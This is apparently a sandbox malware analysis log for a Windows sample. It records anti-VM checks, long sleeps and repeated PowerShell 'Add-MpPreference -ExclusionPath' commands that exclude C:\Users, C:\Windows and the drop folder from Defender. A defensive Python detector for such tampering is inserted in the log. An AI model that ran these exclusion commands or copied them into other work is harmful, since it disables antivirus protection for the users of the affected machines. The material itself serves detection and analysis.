Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1744 | Thread sleep count: 7055 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6108 | Thread sleep count: 2642 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5728 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3152 | Thread sleep count: 1518 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3448 | Thread sleep count: 447 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5004 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1544 | Thread sleep count: 7875 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 | Thread sleep count: 1858 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2472 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe TID: 2792 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe | Last function: Thread delayed
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe | Code function: 15_2_0041E359 FindFirstFileA,FindFirstFileA, 15_2_0041E359
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe | Code function: 15_2_00420370 FindFirstFileA,FindFirstFileA, 15_2_00420370
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe | Code function: 15_2_0042498B FindFirstFileA,FindFirstFileA, 15_2_0042498B
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Thread delayed: delay time: 100000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe | Thread delayed: delay time: 60000
Source: YYjRtxS70h.exe, 00000000.00000002.3411987903.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: YYjRtxS70h.exe, 00000000.00000002.3411987903.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\e
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmp | Binary or memory string: VMwareVMware
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000071E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWH
Source: YYjRtxS70h.exe, 00000000.00000002.3411987903.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe | Code function: 15_2_0040168C mov eax, dword ptr fs:[00000030h] 15_2_0040168C
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe | Code function: 15_2_004016AA test dword ptr fs:[00000030h], 00000068h 15_2_004016AA
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe | Code function: 15_2_004016BB mov eax, dword ptr fs:[00000030h] 15_2_004016BB
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\YYjRtxS70h.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\spxzLeEJs
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'"
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\spxzLeEJs
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'"
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Process created: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe "C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\spxzLeEJs
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
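The three Add-MpPreference launches above exclude C:\spxzLeEJs (the directory the payload is dropped into), C:\Users and C:\Windows from Defender scanning; the last two blind Defender to most of the system, not just to the sample. Two caveats for anyone triaging this: Add-MpPreference needs administrative rights, and the report records the process launch, not whether the exclusion was accepted, so on a suspected host the ExclusionPath property returned by Get-MpPreference is what shows the effective state. Also, the 32-bit sample starts the SysWOW64 PowerShell, whose own command line names the System32 path (WoW64 file-system redirection resolves it to SysWOW64), so a detection keyed on the image path alone should accept both. The detector below is an added example written for this page, not code from Joe Sandbox or from the sample: it takes process-creation events in a constructed ProcessEvent shape (parent image, image, command line, as an EDR or Sysmon event would carry them), flags Add-/Set-MpPreference exclusion changes in either command-line form seen in the report, unwraps the -EncodedCommand variant (base64 of UTF-16LE, constructed here because the report does not show it), and rates exclusions of drive roots, wildcards or system-wide directories as high severity. The BROAD_ROOTS list is this example's own choice.

```python
"""Flag Windows Defender exclusion tampering in process-creation events.

Added example for this page (not Joe Sandbox code and not the sample's code).
The ProcessEvent shape and SAMPLE_EVENTS are constructed here; the command lines
are copied from the report except the -EncodedCommand one, which is built inline.
"""
from __future__ import annotations

import base64
import binascii
import re
from dataclasses import dataclass

# Exclusions that effectively blind Defender to the whole system. This list is
# the example's own choice, not a Microsoft or Joe Sandbox definition.
BROAD_ROOTS = {"c:\\users", "c:\\windows", "c:\\programdata", "c:\\program files"}

CMDLET_RE = re.compile(r"\b(Add|Set)-MpPreference\b", re.IGNORECASE)
# The value runs up to the next " -Switch" or end of line; quoting is stripped later.
EXCL_RE = re.compile(r"-Exclusion(Path|Process|Extension)\s+(.+?)(?=\s+-\w|$)", re.IGNORECASE)
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    cmdlet: str
    kind: str            # Path, Process or Extension
    values: list[str]
    severity: str        # "high" or "medium"
    decoded: bool        # True when recovered from -EncodedCommand
    event: ProcessEvent


def unwrap_encoded(cmdline: str) -> tuple[str, bool]:
    """Return (script, True) for -EncodedCommand (base64 of UTF-16LE), else (cmdline, False)."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline, False
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le"), True
    except (binascii.Error, UnicodeDecodeError):
        return cmdline, False


def split_values(raw: str) -> list[str]:
    """Split a comma list and strip the single/double quoting seen in both report variants."""
    out = []
    for v in raw.split(","):
        v = v.strip().strip("'\"").strip()
        if v:
            out.append(v)
    return out


def severity_for(kind: str, values: list[str]) -> str:
    if kind.lower() != "path":
        return "medium"
    for v in values:
        n = v.lower().rstrip("\\")
        if n in BROAD_ROOTS or re.fullmatch(r"[a-z]:", n) or "*" in n:
            return "high"     # drive root, system-wide directory or wildcard
    return "medium"


def analyze(event: ProcessEvent) -> list[Finding]:
    """All exclusion changes requested by one process-creation event."""
    text, decoded = unwrap_encoded(event.command_line)
    cm = CMDLET_RE.search(text)
    if not cm:
        return []
    findings = []
    for m in EXCL_RE.finditer(text):
        kind = m.group(1).capitalize()
        values = split_values(m.group(2))
        findings.append(Finding(cm.group(0), kind, values, severity_for(kind, values), decoded, event))
    return findings


def scan(events: list[ProcessEvent]) -> list[Finding]:
    return [f for e in events for f in analyze(e)]


PS32 = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE = "C:\\Users\\user\\Desktop\\YYjRtxS70h.exe"
# Constructed events: the report's two command-line forms, one benign call, one encoded variant.
SAMPLE_EVENTS = [
    ProcessEvent(SAMPLE, PS32,
                 '"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath \'C:\\spxzLeEJs\'"'),
    ProcessEvent(PS32, PS32,
                 '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\\Users'),
    ProcessEvent(PS32, PS32,
                 '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -Command Get-MpPreference'),
    # Constructed: the same change hidden behind -EncodedCommand (not in the report).
    ProcessEvent(SAMPLE, PS32, "powershell.exe -nop -w hidden -enc "
                 + base64.b64encode("Set-MpPreference -ExclusionPath C:\\, D:\\tmp".encode("utf-16le")).decode()),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        via = " (from -EncodedCommand)" if f.decoded else ""
        print(f"[{f.severity.upper()}] {f.cmdlet} -Exclusion{f.kind} {f.values}{via} <- {f.event.image}")
```

Run as-is it reports the C:\spxzLeEJs exclusion as medium and the C:\Users and encoded drive-root exclusions as high; the Get-MpPreference call produces nothing. Severity is decided on the requested path, not on the parent process, so the same rule fires whether the cmdlet is launched by the dropper directly or by the intermediate PowerShell.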
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Queries volume information: C:\Users\user\Desktop\YYjRtxS70h.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (2 consecutive identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (3 consecutive identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (2 consecutive identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (6 consecutive identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (2 consecutive identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (3 consecutive identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (2 consecutive identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (7 consecutive identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (2 consecutive identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (3 consecutive identical entries)
